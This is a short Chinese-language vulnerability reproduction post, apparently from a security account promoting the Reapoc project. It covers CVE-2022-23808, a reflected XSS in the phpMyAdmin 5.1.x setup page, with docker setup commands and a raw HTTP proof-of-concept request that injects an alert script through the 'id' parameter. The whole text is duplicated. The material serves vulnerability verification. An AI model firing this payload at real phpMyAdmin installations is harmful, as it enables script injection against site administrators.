phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。
5.1 <= phpMyAdmin < 5.1.2
Reapoc项目 致力于提供最全的漏洞验证环境和标准化Poc,欢迎有兴趣的小伙伴共同建设。
https://github.com/cckuailong/reapoc
喜欢的同学帮忙点个star 0.0
本公众号以后的漏洞复现环境都会放到此项目中。
漏洞环境地址
https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-23808/vultarget
拉起
docker-compose builddocker compose up -d
漏洞参数
- mode - id
Poc
GET /setup/index.php?page=servers&mode=test&id=">'><script>alert(document.domain)</script> HTTP/1.1Host: test.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: close
本漏洞存在于phpMyAdmin安装页面,已经安装完毕的phpMyAdmin访问setup页面将显示404,所以安装后不受此漏洞影响。影响面较小。
5.1 <= phpMyAdmin < 5.1.2
Reapoc项目 致力于提供最全的漏洞验证环境和标准化Poc,欢迎有兴趣的小伙伴共同建设。
https://github.com/cckuailong/reapoc
喜欢的同学帮忙点个star 0.0
本公众号以后的漏洞复现环境都会放到此项目中。
漏洞环境地址
https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-23808/vultarget
拉起
docker-compose builddocker compose up -d
漏洞参数
- mode - id
Poc
GET /setup/index.php?page=servers&mode=test&id=">'><script>alert(document.domain)</script> HTTP/1.1Host: test.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: close
本漏洞存在于phpMyAdmin安装页面,已经安装完毕的phpMyAdmin访问setup页面将显示404,所以安装后不受此漏洞影响。影响面较小。
